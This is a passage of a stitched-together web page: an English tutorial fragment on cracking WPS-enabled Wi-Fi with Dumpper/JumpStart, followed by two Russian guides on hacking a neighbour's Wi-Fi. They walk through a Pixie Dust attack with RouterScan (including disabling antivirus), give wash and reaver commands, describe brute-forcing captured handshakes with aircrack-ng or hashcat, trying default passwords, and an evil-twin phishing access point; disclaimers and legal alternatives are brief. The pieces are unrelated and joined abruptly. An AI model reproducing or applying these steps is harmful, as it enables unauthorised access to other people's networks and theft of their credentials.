8) Jumpstart checks for the Routers nears you and maps it to the one you are trying to hack

9) Jumpstart tries to «Associate with the network» and runs few command on the target router trying to get details from it. 

10) In just few mins, you can see that you are already connected to the network that you are trying to hack. 

11) Click on «Profiles» to see the passwords of all the networks that you connected to already at least once. 

12) Click on Any Profile or network name (SSID) to view the details of the networks along with the password and the encryption which the network uses.

13) You can check the passwords of the connected networked using different ways, here is one without using any tools or applications or without running any commands. 

14) Click on «Open Network and Sharing Center» 

15) Click on your «Router Name» (SSID) 

16) In the «General» tab click on «Wireless Properties«

17) Move to «Security» tab. 

18) In Security Tab, check the «Show Character» button, then you can see «Network Security Key» which is the password of the router that you are connected to. 

Note: If you are logged into the system as a Limited user; you might be prompted to enter your system password. 

If you are Stuck anywhere
in the process of hacking wifi, feel free to comment below, i will try to help
you solve your problem. Before that please check Frequently asked questions.
you might find the answer you are looking for.

Frequently Asked Questions:


1) Does This method work?? 

Ans:

 Yes, it works, but not on all
kinds of networks and routers. As i mentioned in the above article using
jumpstart, you can hack only wifi routers secured with wpa/wpa2 — wps enabled



2) 
Jumpstart shows Wireless configuration
failed! what could be the reason for it not to be successful? 

Ans:

 Same answer as
above, because it is not programmed to hack routers that are already patched of
this vulnerability. To put it into simple words, router is much stronger than
the attack 


3) Hacking with JumpStart Failed, how should i hack this
particular network now??

Ans:

  Not all Hacks
on first try, you need to do a lot of digging before you are trying to hack
something, Same goes for wifi networks as well. Hacking is not easy at all.
There are many other methods to hack wifi, but there are not many methods that
work on all kinds of networks or devices. As this is the very basic way of
hacking, we need to go into a little more advanced techniques of wifi hacking
like 
Evil twin Attack. Refer This Article 

4) Networks Found in Wifi Tab but nothing in WPS Tab, what
should i do not ?

Ans: This is neither your fault or Dumpper’s or the system’s fault. This
happened because there are no WPS enabled networks near you. Dumpper and
Jumpstart cannot hack the networks with wps disabled. so you need to go for
another method of wifi hacking, which means you need to work a little on Kali
Linux to hack the network, even though its not as easy as Dumpper. Click here To read what to do if Dumpper
doesnt work
.

In case Jumpstart Failed to hack the router try the following (Hacking With Linux)

If you are not able to understand which
method to select, here is 
complete tutorial on Wifi Hacking, which explains the process of
choosing the method to hack any kind of router. which can be easily understood
by beginners. Follow this article, once you scroll down a little you can find
all the methods, usage and the method selection for hacking any kind of
router.  

Refer To: 

Ломаем Wi-Fi соседа через RouterScan

https://t.me/EvilPentest_Net

Многие из вас давно хотели либо слышали что-то про взлом(Тестирование)
Wi-Fi сетей

Сегодня мы проведём атаку на WPS сервер Wi-Fi Буквально с OS Windows

Для начала разберёмся как она работает

Атака Pixie Dust основана на слабости в процессе обмена ключами, используемом в протоколе WPS

  1. Злоумышленник перехватывает обмен данными между точкой доступа и клиентским устройством во время попытки установки соединения через WPS.
  2. Злоумышленник анализирует перехваченные данные и идентифицирует уязвимые фрагменты, которые могут быть использованы для вычисления PIN-кода.
  3. Злоумышленник использует алгоритмы вычисления и перебора, чтобы найти правильный PIN-код.
  4. Если успешно найден правильный PIN-код, злоумышленник может использовать его для установки соединения с Wi-Fi сетью и получения доступа к ее

Звучит страшно но это не так

Действуем!

  1. В поисковике вводим Routerscan

2. скачиваем архив и распаковываем

Перед распаковкой выключи антивирус!

3. заходим в папку архива «prerelease», и запускаем роутер скан

4. Переходим в раздел «Wireless Networks» и ставим галочку напротив

«Enable discovery»

5. Нажимаем на нужную сеть, и выполняем комбинацию клавиш «W»

Нас перекинет в окно атаки, но для начала нам нужно узнать лучшие пины для него

Закрываем окно, нажимаем «Ctrl+W»

Если пины не появились, нажимаем на «Suggest», Если и так их нет то нажимаем «Get-All»

Делаем так пока в выше показанном окне «PINs:» не появятся пины

После этого запускаем атаку «Start audit» и ждём подбора пинов

ВАЖНО!

Перед всеми действиями установить «WinPcaP»

https://www.winpcap.org

Отключить антивирус

Так же у атакуемого устройства должен быть включён WPS

Если атака успешна пароль появится во вкладке «Key»

Это не быстрый процесс и не всегда эффективный, но я рассказал про один из способов к тому же без участия KALI-LINUX

Материал предоставлен ИСКЛЮЧИТЕЛЬНО В ОЗНАКОМИТЕЛЬНЫХ ЦЕЛЯХ

Технически подключиться к любому интернету без пароля возможно через уязвимости WPS, подбор паролей или использование открытых сетей. Однако это противозаконно и влечет ответственность. В статье – методы, риски и легальные альтернативы. 

Можно ли подключиться к чужому Wi-Fi без пароля?

Прежде как подключиться к чужому интернету, важно понять, какие варианты вообще существуют и какие из них работают на практике. Большинство современных роутеров защищены паролями, но остаются уязвимости:

Открытые сети

Некоторые пользователи не ставят пароль на Wi-Fi, особенно в общественных местах или при настройке нового роутера. Такие сети отображаются в списке доступных подключений без значка “ключа”. 

Как проверить:

  1. Зайдите в настройки Wi-Fi на смартфоне или ноутбуке. 
  2. Найдите сеть без защиты. 
  3. Подключитесь – если интернет работает, можно пользоваться. 

Из минусов стоит отметить то, что владелец может заметить постороннее устройство и заблокировать его, а также то, что открытые сети часто имеют ограниченную скорость.

Уязвимости WPS

WPS (Wi-Fi Protected Setup) – функция быстрого подключения по PIN-коду. Если она включена, злоумышленник может подобрать код и получить доступ. PIN состоит из 8 цифр, последняя – контрольная. Некоторые роутеры имеют уязвимости, позволяющие подобрать код за несколько часов.

Можно использовать такие инструменты, как Reaver (для Linux) и WPSPixie (для Android). 

Из рисков стоит отметить то, что современные роутеры часто блокируют WPS после нескольких неудачных попыток, а также то, что владелец сети увидит подозрительную активность. 

Подбор пароля (брутфорс) 

Если WPS отключен, единственным способом остается перебор паролей. 

Процесс выглядит следующим образом: сначала перехватывается хэш пароля с помощью Airodump-ng, затем используется словарь распространенных комбинаций, например RockYou.txt, после чего применяются инструменты вроде Aircrack-ng или Hashcat для расшифровки. 

Однако у этого метода есть существенные недостатки. Во-первых, он требует много времени — процесс может занять от нескольких часов до нескольких дней. Во-вторых, современные роутеры с поддержкой WPA3 практически невозможно взломать таким способом. Кроме того, антивирусные программы могут блокировать подобное ПО. 

Хотя теоретически подключиться к чужой Wi-Fi сети возможно, на практике это сопряжено с большими сложностями, высоким риском и является противозаконным действием.

Как подключиться к соседскому интернету

Если вы все же решили попробовать подключиться к интернету соседей, разберем рабочие методы (но помните о последствиях). 

Способ 1. Использование открытых сетей

Для начала включите Wi-Fi на своём устройстве и выполните поиск доступных сетей. Обратите внимание на те, что отображаются без значка «замка» — это означает, что они открыты для подключения. Часто такие сети имеют стандартные названия, например, Free_WiFi или HomeNetwork, поэтому стоит проверить их в первую очередь.Если сеть доступна, но запрашивает авторизацию, можно попробовать стандартные пароли, такие как admin, 12345678 или password. Также стоит проверить, не требуется ли вход через веб-страницу — это распространённая практика в общественных местах, например, в кафе или аэропортах. В таком случае после подключения откройте браузер, и система может автоматически перенаправить вас на страницу ввода кода или согласия с условиями использования.

Способ 2. Взлом WPS

Для начала нужно установить **Kali Linux** или загрузиться с Live-USB. Затем открываем терминал и вводим команду `wash -i wlan0`, где **wlan0** — это название вашей Wi-Fi-карты. Эта команда покажет список роутеров с активной функцией WPS. Обнаружив уязвимый роутер, запускаем подбор PIN-кода командой `reaver -i wlan0 -b MAC_адрес_роутера -vv`. Если атака пройдет успешно, в терминале отобразится пароль от Wi-Fi сети. Но учтите, что этот способ часто не срабатывает. Большинство современных роутеров блокируют WPS после 5-10 неудачных попыток, а новые модели и вовсе защищены от подобных атак. Кроме того, многие производители теперь используют более сложные алгоритмы генерации PIN-кодов, что делает взлом практически невозможным.

Способ 3. Фишинг (фальшивая точка доступа) 

Злоумышленник создает беспроводную сеть, полностью повторяющую название (SSID) реальной сети жертвы. Когда пользователь пытается подключиться к знакомой сети, его устройство может автоматически присоединиться к этой подделке. В момент ввода пароля для «подтверждения подключения» все учетные данные перехватываются злоумышленником. 

Стоит отметить, что хотя подобные методы технически осуществимы, их использование сопряжено с серьезными рисками. Современные системы защиты и бдительность пользователей значительно снижают эффективность таких атак. Более того, в случае обнаружения злоумышленнику грозит блокировка оборудования и серьезная уголовная ответственность за несанкционированный доступ к компьютерным сетям.

Легальные способы получить бесплатный Wi-Fi

Многие ищут способы подключиться к интернету бесплатно, но не все готовы нарушать закон. К счастью, существуют абсолютно легальные методы доступа в сеть, которые не требуют взлома чужих паролей. Рассмотрим самые эффективные и доступные варианты. 

Гостевые Wi-Fi сети в общественных местах 

Самый простой способ получить бесплатный интернет – воспользоваться открытыми сетями в местах массового скопления людей. 

Где искать бесплатный Wi-Fi:

  • Кафе и рестораны (Starbucks, McDonald’s, KFC, «Кофемания») часто предоставляют гостевой доступ. Иногда требуется ввести номер телефона или подтвердить согласие с правилами.
  • Библиотеки и университеты – во многих городах муниципальные библиотеки и учебные заведения раздают открытый интернет.
  • Торговые центры – крупные ТЦ (например, «Авиапарк» в Москве или «Галерея» в Санкт-Петербурге) предлагают бесплатный Wi-Fi для посетителей.
  • Транспортные узлы – вокзалы, аэропорты, станции метро (в Москве – «Москоннект», в Питере – «MT_FREE»).

Для доступа к бесплатному интернету в заведениях нужно найти в списке доступных сетей точку доступа с названием этого места, например “McDonald’s_Free_WiFi». После подключения откройте любой браузер — в большинстве случаев система автоматически перенаправит вас на страницу авторизации, где потребуется подтвердить вход через SMS или социальные сети. Как только процедура верификации будет завершена, интернет станет доступен для использования. 

Приложения с базой паролей от Wi-Fi 

Если поблизости нет открытых сетей, можно воспользоваться специальными сервисами, которые собирают данные о доступных точках доступа. 

Популярные приложения:

  • WiFi Map – крупнейшая база с миллионами паролей от Wi-Fi по всему миру. Пользователи сами добавляют точки доступа, поэтому можно найти работающие варианты даже в жилых районах.
  • Instabridge – автоматически подключается к известным сетям, если вы находитесь рядом.
  • ZenMate WiFi – показывает ближайшие бесплатные точки доступа с отзывами о скорости.

Для начала нужно скачать специальное приложение, которое доступно как в Google Play, так и в App Store. После установки включите GPS на своем устройстве — это позволит программе определить ваше местоположение и найти ближайшие доступные сети. Затем вы можете выбрать подходящую точку доступа и попытаться к ней подключиться. 

Договориться с соседом о совместном использовании Wi-Fi

Если вам нужен стабильный интернет дома, но нет возможности провести свой, можно попробовать легально договориться с соседями. 

Как это сделать:

  • Предложить оплату – многие согласятся поделиться интернетом за небольшую ежемесячную плату (200-500 рублей).
  • Обмен трафиком – если у вас тоже есть роутер, можно создать общую сеть.
  • Использовать гостевое подключение – некоторые роутеры поддерживают гостевой режим с ограничением скорости.

Мы разобрали как подключиться к интернету без пароля. Лучшие варианты – публичные сети, специализированные приложения и договоренности с соседями. Эти способы не нарушают закон и позволяют пользоваться Wi-Fi без риска. 

Если же вам нужен стабильный доступ, лучше оформить собственный тариф – это избавит от поиска точек доступа и проблем с безопасностью.

Понравилась статья? Поделить с друзьями:
0 0 голоса
Рейтинг статьи
Подписаться
Уведомить о
guest

0 комментариев
Старые
Новые Популярные
Межтекстовые Отзывы
Посмотреть все комментарии
  • Safari windows x64 download
  • You cannot escape windows 10
  • Настройка outlook windows 10 exchange
  • Невидимый значок на панели задач как убрать windows 10
  • C0000135 windows 7 как исправить